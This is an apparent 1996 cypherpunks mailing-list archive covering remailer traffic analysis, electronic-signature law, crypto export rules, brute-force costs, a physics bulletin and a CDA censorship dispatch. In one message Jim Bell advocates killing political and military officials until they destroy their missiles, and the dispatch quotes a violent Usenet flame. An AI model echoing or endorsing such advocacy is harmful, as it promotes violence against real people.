>the delays and shuffling, then it becomes difficult for the analyst
>to match message a with message b, leaving him with what he already
>knew (that A and RemailerX have a common interest, as to B and RemailerX,
>but the interests may be wholly unrelated).
>
>Multiple remailers on the same machine increases the resolution of
>the address information, at best, improving the analysts ability to
>make connections.  The same traffic load going to a single remailer
>at the site makes the analyst's job harder.
>
>>The other threat it helps with is that if XYZ.COM gets complaints
>>about that evil user Zut, she can kick her off (Bad Zut!)
>>and still leave Xenu and Yak alone; if the remailer service
>>were provided by the machine owner herself she might be directly liable.
>
>Hmm.  Nothing really stops the machine owner from creating a personal
>anonymous account to run the remailer.  When someone complains, shut it
>down and create a new one.  There isn't yet a law which requires that
>the owner be able to identify the user.  This affords the same
>protection that multiple users does.


The time correlation attack can be defeated by sending mail into the
remailer network with a period roughly equal to the propagation time of a
message through a chain. That way your messages correlate with absolutely
all receipts of all messages. That contains no information.

        -Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 5 Jun 1996 18:17:54 +0800
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <199606050507.WAA09930@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 PM 6/4/96 -0700, Sandy Sandfort wrote:
> Carl Ellison wrote:
>>After the meeting ended it hit me what the problem is and I 
>>mentioned it to PRZ.  We're complaining that the Executive 
>>has gone rogue -- is disobeying the will of the people.  
>>PRZ likened it to Nixon's war in Cambodia.
>
> Jim Bell replied:
>
>>I have a solution to that problem.
>
>My question for member of this list is:  When Bell finally
>goes too far and they arrest or shoot him, how can we best
>capitalize on his martyrdom?  Or in a more negative light,
>what damage control will we need to do in that case?
>Now I know that barking dogs rarely bite, but Jim may just
>fool us and find his cajones.  In any event, the sort of 
>yapping he is doing could itself be considered a crime that 
>could attract the sort of negative attention he apparently 
>craves.

If there is any doubt that we _need_ a system to rid us of these sleazy 
politicians: I just saw tonight's PBS McNeil news hour, and they had two 
politicians on, one of which was promoting a re-emergence of the "Star Wars" 
missile defense system, which even under optimistic scenarios would cost 
hundreds of billions of dollars.

My solution is simpler and far less expensive: Target any political or 
military person at any level who is directly or indirectly in control of any 
offensive missile system (nuclear or otherwise), killing off as many as it 
takes until they cry "uncle" and destroy all of that hardware.  Probable 
cost of this persuasian?  A few hundred million dollars, at most.

Who is committing the crime, here?  Maybe, someday, you'll start really 
LISTENING to what I have to say.

ObCrypto?  Your motivations are quite opaque.  Maybe we can turn them into a 
cryptosystem?




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 5 Jun 1996 16:34:38 +0800
To: Dan Haskovec <cypherpunks@toad.com
Subject: Re: Class III InfoWar: TST Article
Message-ID: <2.2.32.19960605021224.00c9e1d8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:29 PM 6/4/96 -0700, Dan Haskovec wrote:
>Here's the reply I got from a friend that I forwarded it to....
>
>
>     and the verdict is... NetMYTH!  I checked the cite in the article on 
>     cyberterrorism... no such article ran on 6/2/96 in the Times 
>     (London)... nor, in fact, in any newspaper available on Nexis... 
>     just thought I would let you know...

Not only is it visible in any copy of the Sunday Times available in NYC, it
is also on the Times' website at:

http://www.sunday-times.co.uk/news/pages/Sunday-Times/frontpage.html

Registration required.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 5 Jun 1996 18:40:08 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: Electronic Signature Act Of 1996
In-Reply-To: <2.2.32.19960604165840.00725e30@popmail.crl.com>
Message-ID: <199606050323.WAA09499@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Sandy Sandfort wrote:
> C'punks,
> 
> At 11:11 AM 6/4/96 -0400, Perry E. Metzger wrote:
> 
> >...I get the impression that under the common law, an ink 
> >signature is merely a demonstration that a party assented 
> >to a contract, and except for certain contracts (which 
> >usually require witnesses etc.) there is no requirement in 
> >the law that a contract even be on paper...
> 
> The "Statute of Frauds" lists the exceptions and they cover
> most important contracts.  I seem to recall that contracts
> over a given amount or for interests in real property for 
> periods of a year or more are covered.  I'm sure someone 
> with current access to legal research resources will post
> a better explanation.

[I AM NOT A LAWYER]

The following contracts are required to be in writing, in most states: 


1. A contract of an executor or administrator to answer
for a duty of the decedent (the executor-administrator
provision).

2. A contract to answer for debt or default of another (the suretyship
provision).

3. A contract made upon consideration of marriage (the marriage provision).

4. A contract for sale of goods worth more than $500 (the sales provision).

5. A contract for sale of an interest in land (the land provision).

6. A contract not preformable within a year (the one-year provision).

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 5 Jun 1996 19:12:34 +0800
To: Black Unicorn <cypherpunks@toad.com>
Subject: Re: On the Hill: Child Porn "Morphing"
Message-ID: <199606050531.WAA27734@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:45 PM 6/4/96 -0400, Black Unicorn wrote:
>"Morphing" seems to be the latest buzzword for putting childrens faces on 
>the bodies of adult models in sexually explicit poses and seems to have 
>attracted enough attention to warrant congressional attention.

The ability to use the faces of famous political people (e.g. Bill&Hillery
or Bob&Libby) in XXXX rated political satire probably has a wider market.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Wed, 5 Jun 1996 17:55:52 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <2.2.32.19960605054113.006e2b2c@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 PM 6/4/96 -0700, Sandy Sandfort wrote:

>My question for member of this list is:  When Bell finally
>goes too far and they arrest or shoot him, how can we best
>capitalize on his martyrdom?  Or in a more negative light,
>what damage control will we need to do in that case?

I think there's a non-trivial chance that this list could be shut down and
anyone who's made interested sounds in the idea brought in to assist the
police in their inquiries.

Damage control will probably be a doomed cause. The media will end up with
selected quotes advocating crypto-anarchy and speaking in a disparaging tone
of those heroic men and women who keep nuts like us reined in, and the only
people who will hear a balanced account will be those who are already wholly
or partially immune to the propaganda mills.

Did I mention I've been feeling pessimistic about a bunch of this stuff lately?

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 5 Jun 1996 16:32:39 +0800
To: ravage@ssz.com (Jim Choate)
Subject: Re: Remailer chain length?
In-Reply-To: <199606011336.IAA11002@einstein.ssz.com>
Message-ID: <199606050357.WAA29773@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jim Choate wrote:

| > I don't think multiple remailers at the same site help anything.
| > 
| 
| I agree completely. If traffic analysis is going to be done on a single box
| it isn't going to matter how many remailers are there.  The monitor will
| simply grab them all. At this point it simply maps them thusly:

|       incoming message > remailer #1 > .... > remailer #n > outgoing
| 
| 
| That this really maps to is obvious:
| 
| 
|       incoming message > remailer #1-#n > outgoing

	Analyzing the traffic through three remailers is more
difficult than analyzing the traffic through one.  One remailer with
three N messages per day is more secure than an equivilant remailer
with N mesasges.

[much good thought deleted.]

|         5. Automaticaly limits spamming unless a remailer allows cloning
|            AND all recipients share a commen private key.

	Or unless the remailer mails to a mail to news gateway.

|         6. It maps 1:1 onto the physical remailer model with the same limits
|            on information at each stage. This allows one to directly apply
|            the current history of precedence involving anonymity and
|            physical remailers.

	With physical remailers, you can open the inner envelopes and
read the message, leaving the end user to wonder where the post office
lost the message.  With 'real' remailers, the lost message can't be
read, only not delivered.


| This is the basic model that the Austin Cypherpunks are working on at the
| currrent time. The big problem we have right now is determining if the body
| is actualy encrypted. We have done some basic tests of encryption-spoofing
| using pgp and it is looks to be a thorny problem. It simply is not trivial
| to look at a block of characters and determine if they are actualy
| encrypted. You can't rely on the wrapper around the data put there by the

	I'm not sure I see why this matters?  If you check that the
message is not obviously readable, why not assume that its well
encrypted?  You're rarely required to contort yourself to ensure your
customers are obeying the law (weaponsmiths, cryptographers, and banks
excepted.)  

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 5 Jun 1996 16:56:16 +0800
To: cypherpunks@toad.com
Subject: update 273 (fwd)
Message-ID: <199606050358.WAA01618@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From physnews@aip.org Mon Jun  3 17:03:16 1996
Date: Mon, 3 Jun 96 14:06:02 EDT
From: physnews@aip.org (AIP listserver)
Message-Id: <9606031806.AA07182@aip.org>
To: physnews-mailing@aip.org
Subject: update 273


PHYSICS NEWS UPDATE                         
The American Institute of Physics Bulletin of Physics News
Number 273  May 31, 1996    by Phillip F. Schewe and Ben Stein

SCHRODINGER'S CAT-ION: Physicists at NIST (Christopher
Monroe, 303-497-7415) have experimentally demonstrated the
principles of the famous Schrodinger's cat thought experiment with
a single beryllium ion. In a 1935 paper, physicist Erwin
Schrodinger proposed the cat paradox: put a cat inside a box, add
a container of poison gas which is activated by the decay of a
radioactive atom, and close the box.  Since the radioactive atom
obeys the rules of quantum mechanics and since therefore its state
is indeterminate until measured by an outside observer, opening the
box and observing the atom (a microscopic quantum system)
instantly determines the status of the cat (a decidedly macroscopic,
non-quantum concept).  The feline is neither alive nor dead until the
radioactive atom is measured by an observer. Although this thought
experiment is impossible to carry out for a number of reasons,
including the fact that the quantum properties of a system tend to
wash out in an object made of many atoms and molecules such as
a cat, the NIST physicists have demonstrated the basic principles
using a single beryllium ion.  The researchers trap the ion with
nonuniform electric fields and cool it to a near standstill.  Laser
pulses then cause the ion to oscillate as a combination of
wavepackets representing two different electronic states.  Additional
laser pulses push apart the two wavepackets to separations of as
much as 80 nanometers, a mesocopic-size scale far bigger than the
normal spatial extent of the ion.  So in this version of Schrodinger's
cat, the ion's electronic state (a quantum property) is linked to (or
"entangled" with)  a mesocopic-scale position (a non-quantum
property). By applying subsequent pulses that bring together the
wavepackets, the researchers detected interference patterns which
provided evidence of the original separation.  Measurements of
Schrodinger cat's states can provide information on how quantum
properties wane with the amount of physical separation between
quantum states.  (C. Monroe et al., Science, 24 May 1996.)

SUPERCONDUCTING TUNNEL JUNCTIONS (STJ), under
development as efficient detectors of x rays, can now also be used
as single-photon detectors at visible wavelengths.  In this regard
they will be welcomed by astronomers who increasingly record
incoming light with charge-coupled device (CCD) arrays.  In
contrast to the silicon-based CCDs, which are insensitive to a
photon's energy (one photon engenders one electron in the
detector), the niobium-based STJ's do discriminate as to energy
(one photon, depending on its energy, can generate thousands of
electrons).  Determining a photon's energy would allow
astronomers to forego filters, which lower the detector's overall
efficiency.  A STJ device developed by an Oxford-Cambridge-European Space Agency (Netherlands) collaboration can detect light
in the wavelength range 200-500 nm with a spectral resolution of 45
nm (this should improve to 20 nm or better).  The STJ can also
determine the photon's time of arrival at the millisecond level, a
property the would be handy for studying fast astronomical
processes such as pulsars.  (A. Peacock et al., Nature, 9 May
1996.)

PHYSICS BACHELOR'S DEGREES. Here are some highlights
from a new AIP report on 1994 degree recipients in the U.S.---the
annual number of degrees continues to decline slightly; more fresh
graduates are looking for jobs rather than heading for graduate
school; for those going on in their studies 89% receive financial
support; women constitute 17% of the degree recipients; median
starting salary was $27,000.  (Patrick Mulvey, 301-209-3076.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Wed, 5 Jun 1996 16:25:36 +0800
To: cypherpunks@toad.com
Subject: Re: Multiple Remailers at a site?
In-Reply-To: <199606020659.XAA25720@toad.com>
Message-ID: <19960604232157.2053.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:

 > If the remailer does a good job with the delays and shuffling, then
 > it becomes difficult for the analyst to match message a with
 > message b, leaving him with what he already knew (that A and
 > RemailerX have a common interest, as to B and RemailerX, but the
 > interests may be wholly unrelated).

Nope.  Not if each of them runs a remailer.  That's why mixmaster is
SO WONDERFUL.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Haskovec <dhaskove@ucsd.edu>
Date: Wed, 5 Jun 1996 18:14:10 +0800
To: cypherpunks@toad.com
Subject: Re: Class III InfoWar: TST Article
In-Reply-To: <Pine.SOL.3.91.960604163240.338A-100000@echonyc.com>
Message-ID: <Pine.SUN.3.91.960604231655.16402B-100000@sdcc10.ucsd.edu>
MIME-Version: 1.0
Content-Type: text/plain


I stand corrected.... I wonder if this will be / has been picked up by 
any Stateside media?  It seems like something that might sell papers....


On Tue, 4 Jun 1996, Steven Levy wrote:

> If it's a myth, it's quite an elaborate one. On Saturday night I was 
> interviewed by the BBC about this.  The producer read the entire article 
> to me, telling me in was on the front page of the Times. (My comments 
> were not about the specific story, but the underlying security issues.) I 
> don't think he was making it up.
> 
> Maybe the London Times isn't on Nexus.
> 
> Steven
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 5 Jun 1996 18:01:23 +0800
To: jonathon <paul@ljl.COM>
Subject: Re: Markoff in NYT on NTT/RSA chip
Message-ID: <199606050644.XAA14496@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:46 AM 6/5/96 +0000, jonathon wrote:
>	paul:
>
>On Tue, 4 Jun 1996, Paul Robichaux wrote:
>> the NTT chipset for use, say, in a Motorola cell switch (made in IL) would
>> seem to be problematic. Buying chips in Japan for shipment to Moto's phone
>> factories in Singapore and Malaysia, however, would appear to be OK. Under
>
>	So the companies simply ship their _entire_ production 
>	facility offshore, to whichever country has no crypto 
>	export regulations.
>
>	<< Any guesses on just how long ITAR stays around, once
>	several companies announce they are terminating the employment
>	of 1000+ people, for work overseas, because of ITAR?  >> 
>
>	And doing all of their manufacturing offshore means they could
>	use Triple-DES, or BlowFish, or any other crypto algorithm.

I seem to recall an announcement recently that Senator Burns is going to 
have a hearing "soon" on his crypto bill.  If that's true, I think it would 
make a good publicity scene if somebody (if possible someone giving 
testimony) were to show up with one of these NTT encryption chips, wave it 
around a bit, and say "I can bring this chip into the country, why can't I 
take it out again?"

Even if you can't get ahold of the real chip, any multi-pin bug will 
probably do for the sound/video-bite.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 5 Jun 1996 20:25:51 +0800
To: cypherpunks@toad.com
Subject: Fight-Censorship Dispatch #12: CDA deathwatch, copyright update
Message-ID: <Pine.3.89.9606050013.A18013-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain



------------------------------------------------------------------------
                        Fight-Censorship Dispatch #12
-----------------------------------------------------------------------------
                          The CDA deathwatch begins
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this dispatch: CDA deathwatch begins, vultures start to circle
                  Copyright update: sucks to continue, sucks to delay
                  Fred Cherry, back in action!
                  MIT's Seth Finkelstein weighs in on copyright
                  Internet Caucus prepares pro-Net resolution

June 4, 1996


WASHINGTON, DC -- The CDA deathwatch has begun and hungry scavengers
are starting to close in on the ill-begotten law's moldering carcass.

The Philly court yesterday attracted still more hovering media
vultures by saying they'll announce when they're ready to release
their decision.

What a tease.

This evening I called Chris Hansen, who's leading the ACLU's legal
team challenging the CDA in Philadelphia's Federal court. He told me:

  The court will try to give as much advance notice as possible. This
  is unusual but not unheard of -- all along the court has treated
  this as a very important case. They had the court historian come in
  and take pictures the first day. And the clerk himself has been
  present, not his deputies.

(In case anyone's interested, I'm still offering 3:1 odds in our favor
in Philly, though all bets are off when we get to the Supreme Court.)

In the last week, the ALA/CIEC and ACLU media operations shifted into
overdrive, pumping out a flurry of press advisories telling mediaperns
to be on the lookout -- that a decision is expected "any day now."

That was the idea, at least. Conventional wisdom said that our
three-judge panel in Philly would want to rule before the court in New
York City that's currently hearing a weaker, parallel challenge to the
CDA. After all, Federal judges are political beasts and it's a cinch
that any of 'em would want to write an opinion in this landmark case.

Final arguments in the NYC case were scheduled for yesterday. But at
the hearing, the Manhattan court decided it had more questions for
both sides and gave the government until June 7 to file responses and
the plaintiff, Joe Shea, until June 13.

That means that our court has until the end of next week to issue its
decision -- and still come out first.

And so the deathwatch groans onward...


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
           COPYRIGHT UPDATE: SUCKS TO CONTINUE, SUCKS TO DELAY
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

I wrote in my May 30 dispatch that there's "a fighting chance that
this braindead copyright bill will pass this year." 

Now I'm not as sure. The House subcommittee markup session that
tentatively was scheduled for June 5 has been cancelled, and it won't
take place before June 12 or 13.

That's good and bad. The upside is that this ill-fated bill likely
won't pass in any form this session -- but the mucky underside is that
the courts will continue to rely on a Clinton administration white
paper released last fall by copyright czar Bruce Lehman.

Lehman, who heads the Patents and Trademark Office, hatched this
boondoggle that slams online fair-use rights and slaps service
providers with hefty fines if one of their users violates someone's
copyright.

A well-connected lawyer in DC sent me email on this earlier tonight:

  No copyright legislation is going to be passed this year. This comes
  from [Important Name deleted --DBM]. That means the White Paper will
  guide courts for at least the next very critical six months. The
  Scientology v. Lerma court has been looking [for] legislative
  direction, but they can't stall much longer. They will have to base
  their decision on the only thing they have, the White Paper.

Somehow, I suspect the Church of Scientology won't mind that one bit.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                       FRED CHERRY, BACK IN ACTION!
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

Fred Cherry, everyone's favorite net.loon and a truly redoubtable
USENET flamer, took center stage briefly at yesterday's Shea v. Reno
CDA hearing in New York City. The amateur lawyer succeeded in joining
his lawsuit with Joe Shea's and has been merrily introducing excerpts
from soc.motss "homonazi" flamewars into evidence.

He maintains that to reply to flames, he must use "indecent" or
"patently offensive" language, which could violate the CDA.

Mark Mangan writes on the June 3 hearing:

  In his deep, raspy voice [Judge] Cabranes then called Fred Cherry,
  who had attended every day of the hearings in hopes of consolidating
  his case. The chief judge looked at a paper and pronounced Cherry's
  name again. Someone leaned over the seats and tapped Cherry. He
  awoke, arose, gathered his plastic bags and umbrella and, wearing
  his overcoat, approached the bench. He walked straight to the
  microphone and rested his belongings at his feet. Cherry started
  his hurried talk about how he "despised the ACLU" and what he was
  there to discuss "goes all the way back 30 years."

I interviewed Cherry earlier today. Here's what he told me:

  -------------------------------------------------------------------
  Q: HOW DID YOU FEEL AFTER THE HEARING?

  A: The judges were nice to me. I can't believe how nice they were.
     That's not what I'm used to when I see judges.

  Q: WHAT ABOUT YOUR REQUEST THAT THE CASES BE CONSOLIDATED?

  A: [Shea's attorney, Randall Boe] said he's worried that if I join,
     I'm so far behind that it'll slow him down. That they won't be
     able to get to the Supreme Court...

     I'm just going to tag along like a caboose hitched onto a train.
     [Shea and his attorney] don't want me. They filed a brief, about
     two pages, saying they didn't want me.

  Q: WHAT DID YOU TELL THE JUDGES YESTERDAY?

  A: I came up with something [posted] by Rod Swift that Jesus had a
     large penis. Everybody [in the courtroom] was going crazy.
     Everyone was laughing.

  Q: WILL YOU INTRODUCE THOSE POSTS INTO EVIDENCE?

  A: They're going to give me more time. There's going to be an
     order -- it hasn't come down yet. They'll issue an order
     allowing me to present more exhibits.
  -------------------------------------------------------------------

I asked Cherry for the penis-posts he read aloud, but he still hasn't
sent 'em to me. I was able to track down some seemingly representative
ones that I archived at EFF's web site in April:

  Your ass is so blocked up that you do need some therapeutic relief
  for your constipation -- a condition which has backlogged all the
  shit right back up into your head, Fred.

  nobody has suggested that fred cherry should be thrown in jail, sued
  for libel, or even so much as fined. i have suggested the wisdom of
  packing his asshole with shards of broken glass, but i wasn't
  serious.  i wasnt _that_ serious anyway.

Whatever you think of Cherry's antics, you gotta grant him one thing:
not many people have the balls to demand that a Federal court uphold
their right to flame.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
             MIT'S SETH FINKELSTEIN WEIGHS IN ON COPYRIGHT
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

                 By Seth Finkelstein (sethf@mit.edu)

The fight over the future of copyright law is raging over two
competing concepts: information should be for the public good vs. info
is "private property."

Previously, information has been tightly linked to a physical object
-- a book, a record, a tape. Now, with electronic communication, the
full implications of "copyright" -- where using your printscreen key
may be illegal if not explicitly allowed by license -- are becoming
clear.

Since this "property" is so abstract, it's frightening to contemplate
the regulation needed to control the network to ensure no unauthorized
information gets distributed. In the censorship battles, there's at
least *some* material which is safe. Not so in the copyright wars,
where every message may be required to carry "identification papers,"
to establish that it's not fugitive property that has escaped from its
rightful "owner." (And what does this do to anonymity online?)

Unlike many, I don't believe any particular outcome is inevitable.
It's a question of what sort of future world emerges from the
*political* process. It can be either an electronic commons, shared by
all, or a series of tollbooths on every public online street.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
            INTERNET CAUCUS PREPARES PRO-INTERNET RESOLUTION
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

The congressional Internet Caucus is about to introduce a non-binding
resolution promising to do good by the Net:

  ---------------------------------------------------------------------
  Resolved by the House of Representatives (the Senate concurring),
  That it is the sense of Congress that --

  (1) Congress should educate itself about the Internet and use the
      technology in personal, committee, and leadership offices;

  (2) Congress should work in a bipartisan and bicameral fashion to
      facilitate the growth and advancement of the Internet;

  (3) Congress should maximize the openness of and participation in
      government by the people via the Internet so that our
      constituents can have more information from and more access to
      their elected representatives;

  (4) Congress should promote commerce and free flow of information on
      the Internet;

  (5) Congress should advance the United States' world leadership in the
      digital world by avoiding the passage of laws that stifle
      innovation and increase regulation of the Internet; and

  (6) Congress should work with the Internet community to receive its
      input on the issues affecting the Internet that come before
      Congress.
  ---------------------------------------------------------------------

In today's Campaign Dispatch column on HotWired, Brock Meeks writes:

  The caucus is now 47 members strong, double its original membership.
  But the fight for Net survival -- hell, for simple respect -- is far
  from over. Neither a second-term Clinton nor a Dole presidency gives
  us much reason for hope. We'll be in the trenches for several years
  to come; it's time to get our hands dirty.

More hot air from Congress? Sure. But it's a sea change compared to
where the Net community was a year ago, around the time that TIME
magazine's infamous Cyberporn cover appeared, Marty Rimm published his
fraudulent smut-study, and Sen. Chuck Grassley held the "first-ever"
cybersmut hearing in July...

Stay tuned for more reports.


-----------------------------------------------------------------------------

Today's unsubstantiated rumor:

  Y'all remember Jason "The Weasel" Baron, the DoJ's lumbering,
  cyberchallenged lawyer? Word from an attorney friend of mine says
  that Baron is predicting the DoJ will *lose* on the CDA, three-zip.

Want to subscribe to the announcement-only fight-censorship mailing
list for future Fight-Censorship Dispatches and related updates? Just
send "subscribe fight-censorship-announce" in the body of a message
addressed to:
  majordomo@vorlon.mit.edu

Mentioned in this CDA update:

  Mark Mangan's Shea v. Reno June 3 update:
    http://fight-censorship.dementia.org/dl?num=2691
  EFF's archive on the Fred Cherry v. Reno case:
    http://www.eff.org/pub/Legal/Cases/Fred_Cherry_v_DoJ/
  EFF's archive on the Joe Shea v. Reno case:
    http://www.eff.org/pub/Legal/Cases/Am_Reporter_v_DoJ/
  ACLU predicts decision soon:
    http://fight-censorship.dementia.org/dl?num=2673
  U.S. Congressional Internet Caucus:
    http://www.house.gov/white/internet_caucus/netcauc.html
  Creative Incentive Coalition on copyright:
    http://www.cic.org/
  Digital Future Coalition on copyright:
    http://www.ari.net/dfc/
  Brock Meeks on online copyright:
    http://www.hotwired.com/muckraker/96/20/index3a.html
  Brock Meeks on Internet Caucus, non-binding resolution:
    http://www.hotwired.com/netizen/96/23/index1a.html                 
  Ron Newman's web page on the Church of Scientology:
    http://www.cybercom.net/~rnewman/scientology/

  Fight-Censorship list   <http://fight-censorship.dementia.org/top/>
  Rimm ethics critique    <http://www.cs.cmu.edu/~declan/rimm/>
  Int'l Net-Censorship    <http://www.cs.cmu.edu/~declan/international/>

This and previous Fight-Censorship Dispatches are archived at:
  <http://fight-censorship.dementia.org/top/>

Other relevant web sites:
  <http://www.epic.org/>
  <http://www.eff.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>
  <http://www.ala.org/>

-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 5 Jun 1996 18:20:52 +0800
To: "Bruce M." <brucem@wichita.fn.net>
Subject: Re: Cost of brute force decryption
Message-ID: <199606050631.CAA01285@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  4 Jun 96 at 10:58, Bruce M. wrote:

[..]
> 	"If you can ensure secrecy either until no one cares about the 
> information or so that cracking the code costs more than the information 
> is worth, it's 'secure enough.'
> 
> 	"For example a 40-bit key takes about $10,000 worth of supercomputer 
> time and two weeks to crack.  Although this key may be adequate to 
> protect my checking account, it's probably not large enough for the 
> accounts of a major corporation.
[..]

The figures look familiar.  No references around.  I'm not sure it would 
require a whole two weeks for 40-bits, though.  Possibly less than a 
day? (Or was that why you asked baout the figures?)

The "$10,000 worth of supercomputer time" is fuzzy.  One thing that's
left out is that once an organization already owns the equipment and 
has the money to spare, it may be worthwhile to crack things of less 
importance like personal checking info, email, etc.

Rob.


---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 5 Jun 1996 20:56:48 +0800
To: cypherpunks@toad.com
Subject: Re: Electronic Signature Act Of 1996
Message-ID: <2.2.16.19960605091100.1cd70da2@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain



I think more apropos to the discussion of electronic signatures is UCC
1-201(39), "'Signed' includes any symbol executed or adopted by a party with
present intention to authenticate a writing." Comment 39 to 1-201 indicates
"[a]uthentication may be printed, stamped or written; it may be by initials
or by thumbprint. It may be on any part of the document and in appropriate
cases may be found in a billhead or letterhead. No catalog of possible
authentications can be complete and the court must use common sense and
commercial experience in passing upon these matters. The question always is
whether the symbol was executed or adopted by the party with present
intention to authenticate the writing." And comment 2 to 3-401 (re
negotiable instruments) indicates that a signature may be "handwritten,
typed, printed or made in any other manner."

So I don't see why that wouldn't include a PGP signature, a traditional
".signature" block, or the typed "/s/ Greg Broiles" used in some
circumstances. (Of course, the UCC doesn't apply to every transaction, nor
is it adopted in identical form in every state, blah blah blah.) But it's
always nice if the legislature is willing to say "This is the right way to
create an electronic signature" because then we don't have to wonder. 
(However, a signature and a contract are not the same thing - and you don't
need to have a contract to have an enforceable obligation. A nonrepudiable
document still isn't a self-executing one.)

--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Wed, 5 Jun 1996 18:09:11 +0800
To: Paul Robichaux <paul@ljl.COM>
Subject: Re: Markoff in NYT on NTT/RSA chip
In-Reply-To: <v03007101adda1bc74f88@[206.151.234.118]>
Message-ID: <Pine.3.89.9606050304.A8556-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain


	paul:

On Tue, 4 Jun 1996, Paul Robichaux wrote:
> the NTT chipset for use, say, in a Motorola cell switch (made in IL) would
> seem to be problematic. Buying chips in Japan for shipment to Moto's phone
> factories in Singapore and Malaysia, however, would appear to be OK. Under

	So the companies simply ship their _entire_ production 
	facility offshore, to whichever country has no crypto 
	export regulations.

	<< Any guesses on just how long ITAR stays around, once
	several companies announce they are terminating the employment
	of 1000+ people, for work overseas, because of ITAR?  >> 

